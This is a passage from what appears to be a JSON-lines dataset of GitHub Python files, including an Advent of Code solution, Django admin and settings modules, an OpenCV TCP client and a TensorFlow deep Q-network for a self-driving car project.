value_iteration(np.zeros(22), 0, 0.7)\n # plt.figure()\n # plt.plot(Vstar)\n # plt.title(\"Value*\")\n\n # Pstar = value_to_policy(Vstar, 0, 0.7)\n # plt.figure()\n # plt.plot(Pstar)\n # plt.title(\"Policy*\")\n\n # Vstar = value_iteration(np.zeros(22), -1, 1)\n # plt.figure()\n # plt.plot(Vstar)\n # plt.title(\"Value*\")\n\n # Pstar = value_to_policy(Vstar, -1, 1)\n # plt.figure()\n # plt.plot(Pstar)\n # plt.title(\"Policy*\")\n\n RL_analysis()","repo_name":"cO-Oe/AIgames","sub_path":"blackjack/blackjack.py","file_name":"blackjack.py","file_ext":"py","file_size_in_byte":3686,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"31769493457","text":"\nimport math, copy, re, hashlib\nimport itertools as it\nfrom lib import check_data, parse_row, 
has_all_fields\n\ndef rl(arr):\n\treturn range(len(arr))\n\ndef part_1(data):\n\n\ti = 0\n\tcnt = 0\n\tcurr_data = dict()\n\twhile i <= len(data):\n\t\tif i == len(data) or data[i].strip() == \"\":\n\t\t\tif has_all_fields(curr_data): \n\t\t\t\tcnt += 1\n\t\t\tcurr_data = dict()\n\t\t\ti += 1\n\t\t\tcontinue\n\t\tcurr_data = parse_row(curr_data, data[i])\n\t\ti += 1\n\tprint(cnt)\n\tprint('END OF PART1')\n\treturn\n\ndef part_2(data):\n\ti = 0\n\tcnt = 0\n\tcurr_data = dict()\n\twhile i <= len(data):\n\t\tif i == len(data) or data[i].strip() == \"\":\n\t\t\tif has_all_fields(curr_data) and check_data(curr_data): \n\t\t\t\tcnt += 1\n\t\t\tcurr_data = dict()\n\t\t\ti += 1\n\t\t\tcontinue\n\t\tcurr_data = parse_row(curr_data, data[i])\n\t\ti += 1\n\tprint(cnt)\n\tprint('END OF PART2')\n\treturn \n\n\nif __name__ == '__main__':\n\twith open('04_input') as f:\n\t\tdata = f.read()\n\t\tdata = data.split('\\n')\n\t\t# data = list(map(int, data.split()))\n\n\n\tpart_1(copy.deepcopy(data))\n\tpart_2(copy.deepcopy(data))\n\t","repo_name":"PiErr0r/aoc","sub_path":"2020/04.py","file_name":"04.py","file_ext":"py","file_size_in_byte":1000,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"41788697045","text":"from django.contrib import admin\nfrom django.conf import settings\n\nfrom .models import ThresholdSettings, Spider, TestRun, FailedRequest, Alert\n\n\nclass ThresholdSettingsAdmin(admin.ModelAdmin):\n list_display = ['n_errors_in_row', 'percent_of_failed_requests', 'notify']\nadmin.site.register(ThresholdSettings, ThresholdSettingsAdmin)\n\n\n#class FailedRequestInline(admin.StackedInline):\n# model = FailedRequest\n# max_num = 20\n\n\nclass FailedRequestAdmin(admin.ModelAdmin):\n def partial_error(self):\n return self.error[0:50] + '...' 
if self.error else ''\n\n list_display = ['test_run', 'request', partial_error, 'when_created']\n search_fields = ['test_run__spider__name']\n list_filter = ['test_run__spider']\n ordering = ['test_run', '-when_created']\nadmin.site.register(FailedRequest, FailedRequestAdmin)\n\n\n#class TestRunInline(admin.StackedInline):\n# model = TestRun\n# max_num = 20\n\n\nclass TestRunAdmin(admin.ModelAdmin):\n list_display = ['spider', 'status', 'when_started', 'when_finished',\n 'num_of_failed_requests', 'num_of_successful_requests']\n search_fields = ['spider__name', 'status']\n list_filter = ['spider', 'status']\n #inlines = [FailedRequestInline]\n ordering = ['spider', '-when_started']\nadmin.site.register(TestRun, TestRunAdmin)\n\n\nclass SpiderAdmin(admin.ModelAdmin):\n list_display = ['name', 'threshold_settings', 'n_errors_in_row',\n 'percent_of_failed_requests', 'notify', 'active',\n 'is_error']\n search_fields = ['name']\n list_filter = ['active']\n #inlines = [TestRunInline]\n ordering = ['name']\nadmin.site.register(Spider, SpiderAdmin)\n\n\nif settings.DEBUG:\n admin.site.register(Alert)","repo_name":"aprosdev/ecom-predictor","sub_path":"product_ranking_auto_tests/tests_app/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1727,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"22747424444","text":"import numpy as np\nimport multiprocessing as mp\nfrom time import time\nfrom TCP import Frames_rcv\nimport cv2\n#For testing\ndef main():\n try:\n frame = Frames_rcv('192.168.1.112',6666,True)\n frame.start()\n while frame.is_alive(): # Real time processing loop\n frame_ = frame.get_frame(False) # Getting a fraf in form of BGR\n #frame_ = cv2.flip(frame_,0) # The rest of code here(Any kind of processing is here)\n cv2.imshow('frame',frame_) # The rest of code here(Any kind of processing is here)\n cv2.waitKey(30)\n frame.exit() # clearing the windows\n cv2.destroyAllWindows()\n except (KeyboardInterrupt,IOError,Exception,OSError)as e:\n frame.exit()\n cv2.destroyAllWindows()\n#Main For Testing\nif __name__ == '__main__':\n main()\n","repo_name":"ahmed-a-helal/real-time-action-recognition","sub_path":"communication/Backup/segmentation_pro_client.py","file_name":"segmentation_pro_client.py","file_ext":"py","file_size_in_byte":889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"61"} +{"seq_id":"36322963990","text":"import os\nimport sys\n\nimport environ\nfrom django.utils.translation import ugettext_lazy as _\n\n### We use django-environ to read secrets from .env file\nenv = environ.Env()\nenv.read_env(str((environ.Path(__file__) - 1).path(\".env\")))\n\n# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n\n# Use the \"apps\" folder for our project apps\nsys.path.insert(0, os.path.join(BASE_DIR, \"apps\"))\n\n# `env LC_CTYPE=C tr -dc \"a-zA-Z0-9\" < /dev/random | head -c 50; echo`\nSECRET_KEY = env(\"SECRET_KEY\")\n\nDEBUG = env(\"DEBUG\", default=False)\n\nDATABASES = {\n \"default\": env.db(\"DATABASE_URL\"),\n}\n\nCACHES = {\"default\": env.cache()}\n\nALLOWED_HOSTS = [\"*\"]\n\n\nINSTALLED_APPS = [\n # FileBrowser must be loaded before Django admin\n \"tinymce\",\n \"filebrowser\",\n \"django.contrib.admin\",\n \"django.contrib.auth\",\n \"django.contrib.contenttypes\",\n \"django.contrib.sessions\",\n \"django.contrib.messages\",\n \"django.contrib.staticfiles\",\n 
\"django.contrib.sites\",\n \"django_celery_beat\",\n \"django_celery_results\",\n \"django_countries\",\n \"django_filters\",\n \"corsheaders\",\n \"rest_framework\",\n # \"rest_framework_simplejwt.token_blacklist\",\n \"silk\",\n \"djmoney\",\n \"djmoney.contrib.exchange\",\n \"accounts\",\n \"catalogue\",\n]\n\nSITE_ID = 1\n\nMIDDLEWARE = [\n # \"django.middleware.cache.UpdateCacheMiddleware\",\n \"django.middleware.security.SecurityMiddleware\",\n \"django.contrib.sessions.middleware.SessionMiddleware\",\n \"django.middleware.locale.LocaleMiddleware\",\n \"corsheaders.middleware.CorsMiddleware\",\n \"django.middleware.common.CommonMiddleware\",\n \"django.middleware.csrf.CsrfViewMiddleware\",\n \"corsheaders.middleware.CorsPostCsrfMiddleware\",\n \"django.contrib.auth.middleware.AuthenticationMiddleware\",\n \"django.contrib.messages.middleware.MessageMiddleware\",\n \"django.middleware.clickjacking.XFrameOptionsMiddleware\",\n \"django.middleware.common.BrokenLinkEmailsMiddleware\",\n \"silk.middleware.SilkyMiddleware\",\n # \"django.middleware.cache.FetchFromCacheMiddleware\",\n]\n\nROOT_URLCONF = \"settings.urls\"\n\nTEMPLATES = [\n {\n \"BACKEND\": \"django.template.backends.django.DjangoTemplates\",\n \"DIRS\": [os.path.join(BASE_DIR, \"templates\")], # templates shared between apps\n \"APP_DIRS\": True,\n \"OPTIONS\": {\n \"context_processors\": [\n \"context_processors.set_meta_tags\",\n \"django.template.context_processors.debug\",\n \"django.template.context_processors.request\",\n \"django.contrib.auth.context_processors.auth\",\n \"django.contrib.messages.context_processors.messages\",\n ],\n },\n },\n]\n\nWSGI_APPLICATION = \"settings.wsgi.application\"\n\n\n# Password validation\n# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators\n\nAUTH_PASSWORD_VALIDATORS = [\n {\n \"NAME\": \"django.contrib.auth.password_validation.UserAttributeSimilarityValidator\",\n },\n {\n \"NAME\": \"django.contrib.auth.password_validation.MinimumLengthValidator\",\n },\n {\n \"NAME\": \"django.contrib.auth.password_validation.CommonPasswordValidator\",\n },\n {\n \"NAME\": \"django.contrib.auth.password_validation.NumericPasswordValidator\",\n },\n]\n\n# Cookie settings\nCSRF_COOKIE_HTTPONLY = (\n False # to allow the front-end to retrieve CSRF token from the Cookie\n)\nCSRF_COOKIE_SAMESITE = \"Strict\" # TODO: exactly what will the front-end be doing?\nCSRF_COOKIE_SECURE = True\n\n# Security headers --> already set by nginx\n# SECURE_BROWSER_XSS_FILTER = True\n# SECURE_CONTENT_TYPE_NOSNIFF = True\n\n\n# Internationalization\n# https://docs.djangoproject.com/en/2.2/topics/i18n/\n\nLANGUAGE_CODE = \"en\"\nLANGUAGES = [\n (\"en\", _(\"English\")),\n (\"nl\", _(\"Nederlands\")),\n]\n\nTIME_ZONE = \"Europe/Amsterdam\"\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\nLOCALE_PATHS = ((os.path.join(BASE_DIR, u\"locale/\")),)\n\nCURRENCIES = (\"EUR\", \"GBP\", \"USD\")\nCURRENCY_CHOICES = [(\"EUR\", \"EUR €\"), (\"GBP\", \"GBP £\"), (\"USD\", \"USD $\")]\nBASE_CURRENCY = \"EUR\"\nDEFAULT_CURRENCY = \"EUR\"\nCURRENCY_DECIMAL_PLACES = 4\nOPEN_EXCHANGE_RATES_APP_ID = env(\"OPEN_EXCHANGE_RATES_APP_ID\")\nEXCHANGE_BACKEND = \"djmoney.contrib.exchange.backends.OpenExchangeRatesBackend\"\nMOLLIE_API_KEY_LIVE = env(\"MOLLIE_API_KEY_LIVE\")\nMOLLIE_API_KEY_LIVE = env(\"MOLLIE_API_KEY_LIVE\")\n\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/2.2/howto/static-files/\n\nSTATIC_URL = \"/static/\"\nSTATIC_ROOT = os.path.join(BASE_DIR, 
\"static\")\nSTATICFILES_DIRS = [\n os.path.join(BASE_DIR, \"staticfiles\"),\n]\nMEDIA_URL = \"/media/\"\nMEDIA_ROOT = os.path.join(BASE_DIR, \"media\")\nPREPEND_WWW = True\nAPPEND_SLASH = True\n\nAUTH_USER_MODEL = \"accounts.UserModel\"\nLOGIN_URL = \"admin:login\"\nLOGIN_REDIRECT_URL = \"accounts:profile\"\nADMIN_BCC = []\n\nSERVER_EMAIL = \"django@mancelot.app\"\nDEFAULT_FROM_EMAIL = \"info@mancelot.app\"\nEMAIL_CONFIG = env.email_url(\"EMAIL_URL\")\nvars().update(EMAIL_CONFIG)\n\n# List of who will receive code error notifications. Not used b/c Sentry\nADMINS = [] # use tuples, i.e. (\"Full name\", \"email@example.com\")\n# List of who will receive broken link emails\nMANAGERS = []\n\n\n### Celery Task Scheduler\nCELERY_BROKER_URL = env(\"CELERY_BROKER_URL\")\nCELERY_ACCEPT_CONTENT = [\"application/json\"]\nCELERY_TASK_SERIALIZER = \"json\"\nCELERY_RESULT_SERIALIZER = \"json\"\nCELERY_RESULT_BACKEND = \"django-db\"\nCELERY_CACHE_BACKEND = \"django-cache\"\nCELERY_TIMEZONE = TIME_ZONE\n\n\n### Django REST Framework for API endpoints\nREST_FRAMEWORK = {\n \"DEFAULT_AUTHENTICATION_CLASSES\": (\n \"rest_framework_simplejwt.authentication.JWTAuthentication\",\n \"rest_framework.authentication.SessionAuthentication\",\n ),\n \"DEFAULT_PERMISSION_CLASSES\": [\"rest_framework.permissions.DjangoModelPermissions\"],\n \"DEFAULT_RENDERER_CLASSES\": [\n \"rest_framework.renderers.JSONRenderer\",\n ],\n \"DEFAULT_FILTER_BACKENDS\": [\n \"django_filters.rest_framework.DjangoFilterBackend\",\n ],\n \"DEFAULT_PAGINATION_CLASS\": \"rest_framework.pagination.PageNumberPagination\",\n \"PAGE_SIZE\": 50,\n \"TEST_REQUEST_DEFAULT_FORMAT\": \"json\",\n \"TEST_REQUEST_RENDERER_CLASSES\": [\n \"rest_framework.renderers.MultiPartRenderer\",\n \"rest_framework.renderers.JSONRenderer\",\n \"rest_framework.renderers.TemplateHTMLRenderer\",\n ],\n}\n### Django REST Simple JWT\nfrom datetime import timedelta\n\nSIMPLE_JWT = {\n \"ACCESS_TOKEN_LIFETIME\": timedelta(days=1),\n \"REFRESH_TOKEN_LIFETIME\": timedelta(days=30),\n \"ROTATE_REFRESH_TOKENS\": False,\n \"BLACKLIST_AFTER_ROTATION\": True,\n \"ALGORITHM\": \"HS256\",\n \"SIGNING_KEY\": SECRET_KEY,\n \"VERIFYING_KEY\": None,\n \"AUTH_HEADER_TYPES\": (\"Bearer\",),\n \"USER_ID_FIELD\": \"id\",\n \"USER_ID_CLAIM\": \"user_id\",\n \"AUTH_TOKEN_CLASSES\": (\n \"rest_framework_simplejwt.tokens.AccessToken\",\n ), # or SlidingToken\n \"TOKEN_TYPE_CLAIM\": \"token_type\",\n \"SLIDING_TOKEN_REFRESH_EXP_CLAIM\": \"refresh_exp\",\n \"SLIDING_TOKEN_LIFETIME\": timedelta(days=1),\n \"SLIDING_TOKEN_REFRESH_LIFETIME\": timedelta(days=30),\n}\n\n# True --> CORS_ORIGIN_WHITELIST not used and all origins will be accepted\nCORS_ORIGIN_ALLOW_ALL = False\nCORS_ORIGIN_WHITELIST = [\n \"https://mancelot.app\",\n \"https://www.mancelot.app\",\n \"http://localhost\",\n \"http://localhost:3000\",\n]\nCSRF_TRUSTED_ORIGINS = [ # TODO\n \"mancelot.app\",\n]\nCORS_ALLOW_METHODS = [ # Default, but explicitly added to settings\n \"DELETE\",\n \"GET\",\n \"OPTIONS\",\n \"PATCH\",\n \"POST\",\n \"PUT\",\n]\nCORS_ALLOW_HEADERS = [ # Default, but explicitly added to settings\n \"accept\",\n \"accept-encoding\",\n \"authorization\",\n \"content-type\",\n \"dnt\",\n \"origin\",\n \"user-agent\",\n \"x-csrftoken\",\n \"x-requested-with\",\n]\n\n# Silky for profiling / monitoring the api response times\nSILKY_AUTHENTICATION = True\nSILKY_AUTHORISATION = True # default is_staff=True; overwrite below\nSILKY_PERMISSIONS = lambda user: user.is_superuser\nSILKY_PYTHON_PROFILER = 
False\nSILKY_PYTHON_PROFILER_BINARY = False\n# SILKY_MAX_REQUEST_BODY_SIZE = -1 # Silk takes anything <0 as no limit\n# SILKY_MAX_RESPONSE_BODY_SIZE = 1024 # If response body>1024 bytes, ignore\n# SILKY_INTERCEPT_PERCENT = 50 # log only 50% of requests\n# SILKY_MAX_RECORDED_REQUESTS = 10**4 # garbage collection of old data\n# SILKY_MAX_RECORDED_REQUESTS_CHECK_PERCENT = 10\nSILKY_META = True # to check the effect Silk itself has on response time\n\n\n### Sentry for error reporting\nSENTRY_DSN_API = env(\"SENTRY_DSN_API\", default=\"\")\nimport sentry_sdk\nfrom sentry_sdk.integrations.django import DjangoIntegration\n\nsentry_sdk.init(\n dsn=SENTRY_DSN_API,\n integrations=[DjangoIntegration()],\n environment=env(\"SENTRY_ENVIRONMENT\"),\n)\n\nCECE_API_USER = env(\"CECE_API_USER\", default=\"secret\")\nCECE_API_PASS = env(\"CECE_API_PASS\", default=\"secret\")\nCECE_API_URI = env(\"CECE_API_URI\", default=\"http://example.com\")\n\nMANCELOT_KVK_NUMMER = env(\"MANCELOT_KVK_NUMMER\")\nMANCELOT_BTW_NUMMER = env(\"MANCELOT_BTW_NUMMER\")\n\n\n### FileBrowser to tinker with static files at the server\n# http://django-filebrowser.readthedocs.io/en/latest/settings.html\n# DIRECTORY = \"\"\nFILEBROWSER_DIRECTORY = \"\"\nFILEBROWSER_DEFAULT_PERMISSIONS = 0o644\nFILEBROWSER_OVERWRITE_EXISTING = True\nFILEBROWSER_EXTENSIONS = {\n \"Image\": [\".jpg\", \".jpeg\", \".gif\", \".png\", \".tif\", \".tiff\"],\n \"Document\": [\".pdf\", \".doc\", \".rtf\", \".txt\", \".xls\", \".csv\"],\n \"Video\": [\".mov\", \".wmv\", \".mpeg\", \".mpg\", \".avi\", \".rm\"],\n \"Audio\": [\".mp3\", \".mp4\", \".wav\", \".aiff\", \".midi\", \".m4p\"],\n}\nFILEBROWSER_ADMIN_VERSIONS = [\"big\", \"thumbnail\", \"small\", \"medium\", \"large\"]\n\n\n### TinyMCE as WYSIWYG editor in the FileBrowser\n# https://www.tinymce.com/docs/demo/full-featured/\nTINYMCE_DEFAULT_CONFIG = {\n \"selector\": \"textarea\",\n \"height\": 500,\n \"theme\": \"modern\",\n \"plugins\": [\n \"advlist autolink lists link image charmap print preview hr anchor pagebreak\",\n \"searchreplace wordcount visualblocks visualchars code fullscreen\",\n \"insertdatetime media nonbreaking save table contextmenu directionality\",\n \"emoticons template paste textcolor colorpicker textpattern imagetools codesample toc\",\n ],\n \"toolbar1\": \"undo redo | insert | styleselect | bold italic | alignleft aligncenter alignright alignjustify | bullist numlist outdent indent | link image\",\n \"toolbar2\": \"print preview image | forecolor backcolor emoticons | codesample\",\n \"image_advtab\": True,\n \"templates\": [\n {\"title\": \"Test template 1\", \"content\": \"Test 1\"},\n {\"title\": \"Test template 2\", \"content\": \"Test 2\"},\n ],\n \"content_css\": [\n \"//www.tinymce.com/css/codepen.min.css\",\n # \"/static/css/main.css\",\n ],\n}\n# TINYMCE_SPELLCHECKER = True\nTINYMCE_COMPRESSOR = True\nTINYMCE_FILEBROWSER = True\nTINYMCE_MINIMAL_CONFIG = {\n \"selector\": \"textarea\",\n \"height\": 80,\n \"width\": 500,\n \"menubar\": False,\n \"statusbar\": False,\n \"elementpath\": False,\n \"plugins\": [\n \"link paste autolink code\",\n ],\n \"toolbar1\": \"undo redo | bold italic | bullist numlist outdent indent | link code\",\n \"toolbar2\": \"\",\n}\n\n\nimport logging\n\nLOGGING = {\n \"version\": 1,\n \"disable_existing_loggers\": False,\n \"formatters\": {\n \"verbose\": {\n \"format\": \"{levelname} {asctime} {module} {process:d} {thread:d} {message}\",\n \"style\": \"{\",\n },\n \"simple\": {\n \"format\": \"{levelname} {message}\",\n \"style\": \"{\",\n },\n 
\"console\": {\n \"format\": \"{message}\",\n \"style\": \"{\",\n },\n },\n \"filters\": {\n \"require_debug_true\": {\n \"()\": \"django.utils.log.RequireDebugTrue\",\n },\n },\n \"handlers\": {\n \"file\": {\n \"level\": \"INFO\",\n \"class\": \"logging.FileHandler\",\n \"filename\": \"log/request.log\",\n },\n \"mail_admins\": {\n \"level\": \"ERROR\",\n \"class\": \"django.utils.log.AdminEmailHandler\",\n },\n \"console\": {\n \"level\": \"DEBUG\",\n \"class\": \"logging.StreamHandler\",\n \"formatter\": \"console\",\n },\n },\n \"loggers\": {\n \"django.request\": {\n \"handlers\": [\"file\"],\n \"level\": \"WARNING\",\n \"propagate\": True,\n },\n \"file\": {\n \"handlers\": [\"file\"],\n \"level\": \"DEBUG\",\n \"propagate\": True,\n },\n \"console\": {\n \"handlers\": [\"console\"],\n \"level\": \"DEBUG\",\n \"propagate\": False,\n },\n },\n}\n\nif DEBUG or True:\n PREPEND_WWW = False\n\n INSTALLED_APPS += [\n \"django_extensions\",\n ]\n\n REST_FRAMEWORK[\"DEFAULT_RENDERER_CLASSES\"] += [\n \"rest_framework.renderers.BrowsableAPIRenderer\",\n ]\n","repo_name":"tlrh314/mancelot","sub_path":"backend/settings/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":12840,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"15104733572","text":"import math\nimport numpy as np\nimport os\nimport tensorflow as tf\n\nimport state\nfrom state import State\n\nclass GradientClippingOptimizer(tf.compat.v1.train.Optimizer):\n def __init__(self, optimizer, use_locking=False, name=\"GradientClipper\"):\n super(GradientClippingOptimizer, self).__init__(use_locking, name)\n self.optimizer = optimizer\n\n def compute_gradients(self, *args, **kwargs):\n grads_and_vars = self.optimizer.compute_gradients(*args, **kwargs)\n clipped_grads_and_vars = []\n for (grad, var) in grads_and_vars:\n if grad is not None:\n clipped_grads_and_vars.append((tf.clip_by_value(grad, -1, 1), var))\n else:\n clipped_grads_and_vars.append((grad, var))\n return clipped_grads_and_vars\n\n def apply_gradients(self, *args, **kwargs):\n return self.optimizer.apply_gradients(*args, **kwargs)\n\nclass DeepQNetwork:\n def __init__(self, numActions, baseDir, args):\n \n self.numActions = numActions\n self.baseDir = baseDir\n self.saveModelFrequency = args.save_model_freq\n self.targetModelUpdateFrequency = args.target_model_update_freq\n self.tensorboardFrequency = args.tensorboard_logging_freq\n self.normalizeWeights = args.normalize_weights\n self.gamma = args.gamma\n self.step_frames = args.frame\n\n self.staleSess = None\n \n self.sess = tf.Session()\n \n assert (len(tf.compat.v1.global_variables()) == 0),\"Expected zero variables\"\n self.x, self.y = self.buildNetwork('policy', True, numActions)\n assert (len(tf.compat.v1.trainable_variables()) == 10),\"Expected 10 trainable_variables\"\n assert (len(tf.compat.v1.global_variables()) == 10),\"Expected 10 total variables\"\n self.x_target, self.y_target = self.buildNetwork('target', False, numActions)\n assert (len(tf.compat.v1.trainable_variables()) == 10),\"Expected 10 trainable_variables\"\n assert (len(tf.compat.v1.global_variables()) == 20),\"Expected 20 total variables\"\n\n # build the variable copy ops\n self.update_target = []\n trainable_variables = tf.compat.v1.trainable_variables()\n all_variables = tf.compat.v1.global_variables()\n for i in range(0, len(trainable_variables)):\n self.update_target.append(all_variables[len(trainable_variables) + i].assign(trainable_variables[i]))\n\n self.a = 
tf.compat.v1.placeholder(tf.float32, shape=[None, numActions])\n print('a %s' % (self.a.get_shape()))\n self.y_ = tf.compat.v1.placeholder(tf.float32, [None])\n print('y_ %s' % (self.y_.get_shape()))\n\n self.y_a = tf.reduce_sum(tf.multiply(self.y, self.a), reduction_indices=1)\n print('y_a %s' % (self.y_a.get_shape()))\n\n difference = tf.abs(self.y_a - self.y_)\n quadratic_part = tf.clip_by_value(difference, 0.0, 1.0)\n linear_part = difference - quadratic_part\n errors = (0.5 * tf.square(quadratic_part)) + linear_part\n self.loss = tf.reduce_sum(errors)\n\n tf.compat.v1.summary.scalar('loss', self.loss)\n\n optimizer = tf.compat.v1.train.RMSPropOptimizer(args.learning_rate, decay=.95, epsilon=.01)\n self.train_step = optimizer.minimize(self.loss)\n\n self.saver = tf.compat.v1.train.Saver()\n\n self.merged = tf.compat.v1.summary.merge_all()\n self.summary_writer = tf.compat.v1.summary.FileWriter(self.baseDir + '/tensorboard', self.sess.graph)\n\n if args.model is not None:\n print('Loading from model file %s' % (args.model))\n #self.saver = tf.compat.v1.train.import_meta_graph(args.model + '.meta')\n #self.saver.restore(self.sess, args.model)\n self.saver.restore(self.sess, tf.train.latest_checkpoint(args.model))\n else:\n # Initialize variables\n self.sess.run(tf.compat.v1.global_variables_initializer())\n self.sess.run(self.update_target) # is this necessary?\n\n def buildNetwork(self, name, trainable, numActions):\n \n print(\"Building network for %s trainable=%s\" % (name, trainable))\n\n # First layer takes a screen, and shrinks by 2x\n x = tf.compat.v1.placeholder(tf.uint8, shape=[None, State.IMAGE_SIZE, State.IMAGE_SIZE, self.step_frames], name=\"screens\")\n print(x)\n\n x_normalized = tf.to_float(x) / 255.0\n print(x_normalized)\n\n # Second layer convolves 32 8x8 filters with stride 4 with relu\n with tf.compat.v1.variable_scope(\"cnn1_\" + name):\n W_conv1, b_conv1 = self.makeLayerVariables([8, 8, self.step_frames, 16], trainable, \"conv1\")\n\n h_conv1 = tf.nn.relu(tf.nn.conv2d(x_normalized, W_conv1, strides=[1, 4, 4, 1], padding='VALID') + b_conv1, name=\"h_conv1\")\n print(h_conv1)\n\n # Third layer convolves 64 4x4 filters with stride 2 with relu\n with tf.compat.v1.variable_scope(\"cnn2_\" + name):\n W_conv2, b_conv2 = self.makeLayerVariables([4, 4, 16, 32], trainable, \"conv2\")\n\n h_conv2 = tf.nn.relu(tf.nn.conv2d(h_conv1, W_conv2, strides=[1, 2, 2, 1], padding='VALID') + b_conv2, name=\"h_conv2\")\n print(h_conv2)\n\n # Fourth layer convolves 64 3x3 filters with stride 1 with relu\n with tf.compat.v1.variable_scope(\"cnn3_\" + name):\n W_conv3, b_conv3 = self.makeLayerVariables([3, 3, 32, 32], trainable, \"conv3\")\n\n h_conv3 = tf.nn.relu(tf.nn.conv2d(h_conv2, W_conv3, strides=[1, 1, 1, 1], padding='VALID') + b_conv3, name=\"h_conv3\")\n print(h_conv3)\n\n h_conv3_flat = tf.reshape(h_conv3, [-1, 7 * 7 * 32], name=\"h_conv3_flat\")\n print(h_conv3_flat)\n\n # Fifth layer is fully connected with 512 relu units\n with tf.compat.v1.variable_scope(\"fc1_\" + name):\n W_fc1, b_fc1 = self.makeLayerVariables([7 * 7 * 32, 256], trainable, \"fc1\")\n\n h_fc1 = tf.nn.relu(tf.matmul(h_conv3_flat, W_fc1) + b_fc1, name=\"h_fc1\")\n print(h_fc1)\n\n # Sixth (Output) layer is fully connected linear layer\n with tf.compat.v1.variable_scope(\"fc2_\" + name):\n W_fc2, b_fc2 = self.makeLayerVariables([256, numActions], trainable, \"fc2\")\n\n y = tf.matmul(h_fc1, W_fc2) + b_fc2\n print(y)\n \n return x, y\n\n def makeLayerVariables(self, shape, trainable, name_suffix):\n if 
self.normalizeWeights:\n # This is my best guess at what DeepMind does via torch's Linear.lua and SpatialConvolution.lua (see reset methods).\n # np.prod(shape[0:-1]) is attempting to get the total inputs to each node\n stdv = 1.0 / math.sqrt(np.prod(shape[0:-1]))\n weights = tf.Variable(tf.compat.v1.random_uniform(shape, minval=-stdv, maxval=stdv), trainable=trainable, name='W_' + name_suffix)\n biases = tf.Variable(tf.compat.v1.random_uniform([shape[-1]], minval=-stdv, maxval=stdv), trainable=trainable, name='W_' + name_suffix)\n else:\n weights = tf.Variable(tf.random.truncated_normal(shape, stddev=0.01), trainable=trainable, name='W_' + name_suffix)\n biases = tf.Variable(tf.fill([shape[-1]], 0.1), trainable=trainable, name='W_' + name_suffix)\n self.variable_summaries(weights)\n self.variable_summaries(biases)\n return weights, biases\n\n def variable_summaries(self, var):\n \"\"\"Attach a lot of summaries to a Tensor (for TensorBoard visualization).\"\"\"\n with tf.compat.v1.name_scope('summaries'):\n mean = tf.reduce_mean(var)\n tf.compat.v1.summary.scalar('mean', mean)\n with tf.compat.v1.name_scope('stddev'):\n stddev = tf.sqrt(tf.reduce_mean(tf.square(var - mean)))\n tf.compat.v1.summary.scalar('stddev', stddev)\n tf.compat.v1.summary.scalar('max', tf.reduce_max(var))\n tf.compat.v1.summary.scalar('min', tf.reduce_min(var))\n tf.compat.v1.summary.histogram('histogram', var)\n \n def inference(self, screens):\n y = self.sess.run([self.y], {self.x: screens})\n q_values = np.squeeze(y)\n return np.argmax(q_values)\n \n def train(self, batch, stepNumber):\n\n x2 = [b.state2.getScreens() for b in batch]\n y2 = self.y_target.eval(feed_dict={self.x_target: x2}, session=self.sess)\n\n x = [b.state1.getScreens() for b in batch]\n a = np.zeros((len(batch), self.numActions))\n y_ = np.zeros(len(batch))\n \n for i in range(0, len(batch)):\n a[i, batch[i].action] = 1\n if batch[i].terminal:\n y_[i] = batch[i].reward\n else:\n y_[i] = batch[i].reward + self.gamma * np.max(y2[i])\n\n if stepNumber % self.tensorboardFrequency == 0:\n summary, _ = self.sess.run([self.merged, self.train_step], \n feed_dict={\n self.x: x,\n self.a: a,\n self.y_: y_\n })\n self.summary_writer.add_summary(summary, stepNumber)\n else:\n self.sess.run([self.train_step], \n feed_dict={\n self.x: x,\n self.a: a,\n self.y_: y_\n })\n\n if stepNumber % self.targetModelUpdateFrequency == 0:\n self.sess.run(self.update_target)\n\n if stepNumber % self.targetModelUpdateFrequency == 0 or stepNumber % self.saveModelFrequency == 0:\n dir = self.baseDir + '/models'\n if not os.path.isdir(dir):\n os.makedirs(dir)\n savedPath = self.saver.save(self.sess, dir + '/model.ckpt', global_step=stepNumber)\n","repo_name":"MichaelBosello/self-driving-car","sub_path":"self_driving_car/dqn.py","file_name":"dqn.py","file_ext":"py","file_size_in_byte":9664,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"61"} +{"seq_id":"27998148356","text":"'''\r\n# coding: utf-8\r\n2020.06.26: 在鹏飞的版本上进行了完善,把所有字段都提取出来。\r\n'''\r\n\r\nimport time\r\nimport wave\r\nimport numpy as np\r\nimport struct\r\nfrom scipy.fftpack import fft, ifft\r\nfrom scipy import signal, integrate\r\nfrom scipy.signal import hilbert, welch, stft\r\n\r\n\r\nclass WaveExtractor:\r\n def __init__(self):\r\n pass\r\n\r\n def waveInfoExtract(self, filepath):\r\n '''\r\n contributed by DaiFu 打开WAV文件,提取属性数据\r\n :param filepath: \r\n :return: \r\n '''\r\n file = open(filepath, \"rb\")\r\n file_dict = {}\r\n channel_columns = ['name', 'unit', 
